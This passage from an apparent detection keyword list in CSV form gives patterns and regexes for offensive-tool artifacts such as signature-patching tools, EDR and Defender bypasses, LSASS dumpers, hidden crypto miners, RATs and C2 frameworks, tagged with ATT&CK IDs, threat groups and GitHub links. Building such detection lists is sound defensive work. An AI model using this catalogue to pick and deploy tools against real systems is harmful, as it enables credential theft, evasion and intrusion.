sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*SigLoader.*",".{0,1000}SigLoader\..{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*SigLoader/sigloader.c*",".{0,1000}SigLoader\/sigloader\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*signal2john.py*",".{0,1000}signal2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Signal-Labs/NtdllUnpatcher*",".{0,1000}Signal\-Labs\/NtdllUnpatcher.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*SignToolEx.exe*",".{0,1000}SignToolEx\.exe.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired 
certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*SignToolExHook.dll*",".{0,1000}SignToolExHook\.dll.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*SignToolEx-main*",".{0,1000}SignToolEx\-main.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*SigPloit*",".{0,1000}SigPloit.{0,1000}","offensive_tool_keyword","SigPloit","SigPloit a signaling security testing framework dedicated to Telecom Security professionals and researchers to pentest and exploit vulnerabilities in the signaling protocols used in mobile operators regardless of the generation being in use. SigPloit aims to cover all used protocols used in the operators interconnects SS7. GTP (3G). Diameter (4G) or even SIP for IMS and VoLTE infrastructures used in the access layer and SS7 message encapsulation into SIP-T. 
Recommendations for each vulnerability will be provided to guide the tester and the operator the steps that should be done to enhance their security posture","T1573 - T1562 - T1189 - T1190 - T1201","TA0002 - TA0003 - TA0007 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/SigPloiter/SigPloit","1","1","N/A","N/A","1","40","13","2019-12-17T16:51:23Z","2017-03-30T03:46:03Z" "*sigthief.exe.manifest*",".{0,1000}sigthief\.exe\.manifest.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*SigThief.py*",".{0,1000}SigThief\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Sigthief.py*",".{0,1000}Sigthief\.py.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" 
"*sigthief.py*",".{0,1000}sigthief\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*SigThief-master*",".{0,1000}SigThief\-master.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*sigwhatever.exe*",".{0,1000}sigwhatever\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 
- TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*SilenceDefender.ps1*",".{0,1000}SilenceDefender\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*SilenceDefender_ATP.log*",".{0,1000}SilenceDefender_ATP\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*SilenceDefender_ATP.ps1*",".{0,1000}SilenceDefender_ATP\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - 
T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Silent Crypto Miner Builder*",".{0,1000}Silent\sCrypto\sMiner\sBuilder.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*Silent Lsass Dump*",".{0,1000}Silent\sLsass\sDump.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*Silent.Crypto.Miner.Builder.zip*",".{0,1000}Silent\.Crypto\.Miner\.Builder\.zip.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","1","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*silentbreaksec/Throwback*",".{0,1000}silentbreaksec\/Throwback.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*SilentCryptoMiner.sln*",".{0,1000}SilentCryptoMiner\.sln.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*SilentCryptoMiner-scm-v*",".{0,1000}SilentCryptoMiner\-scm\-v.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","1","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*silenthound.py*",".{0,1000}silenthound\.py.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","1","AD Enumeration","7","5","465","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" "*silenthound_enum*",".{0,1000}silenthound_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*silenthound_output_*.txt*",".{0,1000}silenthound_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*SilentHound-main*",".{0,1000}SilentHound\-main.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","1","AD Enumeration","7","5","465","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" "*silentLsassDump*",".{0,1000}silentLsassDump.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*SilentMoonwalk.cpp*",".{0,1000}SilentMoonwalk\.cpp.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","7","601","92","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*SilentMoonwalk.exe*",".{0,1000}SilentMoonwalk\.exe.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","7","601","92","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*SilentMoonwalk.sln*",".{0,1000}SilentMoonwalk\.sln.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","7","601","92","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" 
"*SilentMoonwalk-master*",".{0,1000}SilentMoonwalk\-master.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","7","601","92","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*SilentProcessExitRegistrySetter.cpp*",".{0,1000}SilentProcessExitRegistrySetter\.cpp.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*SilentProcessExitRegistrySetter.exe*",".{0,1000}SilentProcessExitRegistrySetter\.exe.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*SILENTTRINITY*",".{0,1000}SILENTTRINITY.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*silenttrinity*.dll*",".{0,1000}silenttrinity.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*silly.host.of.iodine.code.kryo.se*",".{0,1000}silly\.host\.of\.iodine\.code\.kryo\.se.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*SillyRAT.git*",".{0,1000}SillyRAT\.git.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","7","670","152","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z" "*sillyrat.py*",".{0,1000}sillyrat\.py.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","7","670","152","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z" "*silver*/beacon.go*",".{0,1000}silver.{0,1000}\/beacon\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*silver*implant.go*",".{0,1000}silver.{0,1000}implant\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*SilverPoision*",".{0,1000}SilverPoision.{0,1000}","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SilverPoision","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SilverPoision/Rock-ON*",".{0,1000}SilverPoision\/Rock\-ON.{0,1000}","offensive_tool_keyword","Rock-ON","Rock-On is an all in one recon tool that will help your Recon process give a boost. It is mainly aimed to automate the whole process of recon and save the time that is being wasted in doing all this stuff manually. A thorough blog will be up in some time. Stay tuned for the Stable version with a UI","T1590 - T1210.001 - T1190 - T1213","TA0007 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/SilverPoision/Rock-ON","1","1","N/A","N/A","3","290","71","2019-11-30T04:00:03Z","2019-06-10T04:42:32Z" "*Simone Margaritelli *",".{0,1000}Simone\sMargaritelli\s\.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*SimoneLazzaris/ditty*",".{0,1000}SimoneLazzaris\/ditty.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SimoneLazzaris/ditty","1","1","N/A","N/A","1","2","1","2022-03-10T16:15:14Z","2022-03-09T09:20:27Z" "*Simple code for creating a DLL for netsh helper DLLs*",".{0,1000}Simple\scode\sfor\screating\sa\sDLL\sfor\snetsh\shelper\sDLLs.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. 
Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*Simple PHP backdoor by DK*",".{0,1000}Simple\sPHP\sbackdoor\sby\sDK.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php text webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*Simple powershell/C# to spawn a process under a different parent process*",".{0,1000}Simple\spowershell\/C\#\sto\sspawn\sa\sprocess\sunder\sa\sdifferent\sparent\sprocess.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","10","4","320","83","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z" "*Simple Shellcode 